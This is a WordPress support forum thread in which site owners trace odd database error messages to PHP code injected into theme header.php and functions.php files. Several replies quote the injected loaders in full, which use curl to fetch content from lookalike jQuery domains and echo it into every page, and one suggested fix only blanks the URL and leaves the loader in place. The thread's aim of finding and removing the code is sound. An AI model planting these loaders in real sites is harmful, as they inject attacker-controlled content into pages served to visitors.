• After word-press version 3.3 upgrade, I am getting below errors

    Couldn’t connect to database server.Couldn’t find database magical_rules.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    But my website is working fine with displaying error HubTank

    I am using below plugins

    Akismet
    All in One SEO Pack – Pro Version
    AmazonFeed
    Auto Twitter Poster
    bbPress
    Eliminate Broken links
    Custom Posts Per Page
    DB-Toolkit
    Donation Can
    Drop Caps
    Facebook Connect
    Global Translator
    Google XML Sitemaps
    Guest Blogger
    Limit Login Attempts
    Manager Meta Tag Manager
    Microkid’s Related Posts
    Number My Post Pages
    Joliprint
    Polaroid Gallery
    Popular Posts
    Post-Plugin Library
    Post Layout
    Q&A Lite
    Quick Adsense
    Secure WordPress
    SEO Smart Links SEO Smart Links
    ShareThis
    SimplePie Core
    Social Login
    StatPress
    StatPress Dashboard Widget Lite
    TinyMCE Advanced
    TweetRoll
    Unique Article Wizard
    Viper’s Video
    W3 Total Cache
    WordPress Database Backup
    WordPress Importer
    WP-DBManager
    WP-PageNavi
    WP Security Scan
    Zemanta Zemanta

Viewing 15 replies - 16 through 30 (of 30 total)
  • THE SOLUTION!!! Yay.

    In the folder containing your selected template, there is a header.php file. Just above </head> there is the following code, delete it. Make sure you have backed up your site, some ppl have accidentally been deleting the wrong code.

    <?php
    
    if(function_exists('curl_init'))
    
    {
    
     $url = "https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js"; 
    
     $ch = curl_init();  
    
     $timeout = 5;  
    
     curl_setopt($ch,CURLOPT_URL,$url); 
    
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    
     $data = curl_exec($ch);  
    
     curl_close($ch); 
    
     echo "$data";
    
    }
    
    ?>

    I have a further issue, after trying to upgarde from within to 3.3(?)… now all I get is a blank screen – I cannot get into admin anymore.
    During the upgade the screen changed to Unavailable now due to maintenenace on the site, so maybe the install was not complete but I can see the site https://www.douglashannay.com but with the correct user & password, as far as I get is a blank screen.
    Anyone please?

    I have a further issue, after trying to upgarde from within to 3.3(?)… now all I get is a blank screen – I cannot get into admin anymore.
    During the upgade the screen changed to Unavailable now due to maintenenace on the site, so maybe the install was not complete but I can see the site https://www.douglashannay.com but with the correct user & password, as far as I get is a blank screen.
    Anyone please?

    THIS IS THE SOLUTION.

    The problem is in this file. https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js

    Some elegant themes use that javascript file.

    To solve the problem, just search “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221; and delete the url. Or replace This

    <?php
    if(function_exists('curl_init')) {
     $url = "https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
     $ch = curl_init();
     $timeout = 5;
     curl_setopt($ch,CURLOPT_URL,$url);
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
     $data = curl_exec($ch);
     curl_close($ch);
     echo "$data";
    }
    ?>

    With this

    <?php
    if(function_exists('curl_init')){
     $url = "";
     $ch = curl_init();
     $timeout = 5;
     curl_setopt($ch,CURLOPT_URL,$url);
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
     $data = curl_exec($ch);
     curl_close($ch);
     echo "$data";
    }
    ?>

    Thank you so much! This worked for me.

    Haha. I’m glad to hear that. ??

    Slay,

    This thread helped me and fixed the same problem for me. I appreciate that

    I found mine in functions.php

    if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = “https://www.wpstats.org/jquery-1.6.3.min.js&#8221;;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}

    and removed it and it works good now

    I’m using the Thesis theme and had a similar problem this morning. Solved it by removing this code:

    <?php
    if(function_exists(‘curl_init’))
    {
    $url = “https://www.code.jqeury.org/jquery-latest.js&#8221;;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    ?>

    out of the head.php file (which is located inside the lib->classes folder in the Thesis theme folder.

    Hope that helps ??

    YES!!!

    I found my issue in function.php… thanks to bigredkacy’s post:D

    And thanks to Slay’s post, I then I removed:D

    https://www.wpstats.org/jquery-1.6.3.min.js

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "https://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();     $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "https://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init();

    [Moderator Note: Please post code or markup snippets between backticks or use the code button.]

    Thanks to you guys, I can have a great weekend!!!

    Thanks Guys!, you made my day! Thanks for the perfect solution!

    hi guys i have the same error, except mine is appear TWICE!!!

    Couldn’t connect to database server.Couldn’t find database jqeury_pronto.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”; Couldn’t connect to database server.Couldn’t find database jqeury_pronto.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    So, i attempt the above solution by remove the below code from my header.php located in the theme folder(i’m using the ProReview theme) and it works!!! but only did half the job…

    <?php
    if(function_exists(‘curl_init’))
    {
    $url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221;;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    ?>

    Now i only have this:

    Couldn’t connect to database server.Couldn’t find database jqeury_pronto.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    Please help. i have been trying to disable and removing plugins that i recently installed and still does not help. my issue can be see at https://maxspf.com/

    Thanks for all you help in advance.

    Regards,
    MaxDailyDeal

    Hello,
    same error also i am using thumbnail-scroller-wordpress-plugin.

    can any one help to fix it. ?

    Couldn’t connect to database server.Couldn’t find database jimbob_je.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    I have the same Problem(Couldn’t find database jimbob_je.). Is the somebody to help?

    I also have a similar problem:

    Couldn’t connect to database server.Couldn’t find database easyjetz_1.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    Does anybody know a common criterion behind these errors?
    Are they generated by any plugin?

Viewing 15 replies - 16 through 30 (of 30 total)
  • The topic ‘After wordpress version 3.3 upgrade, I am getting errors’ is closed to new replies.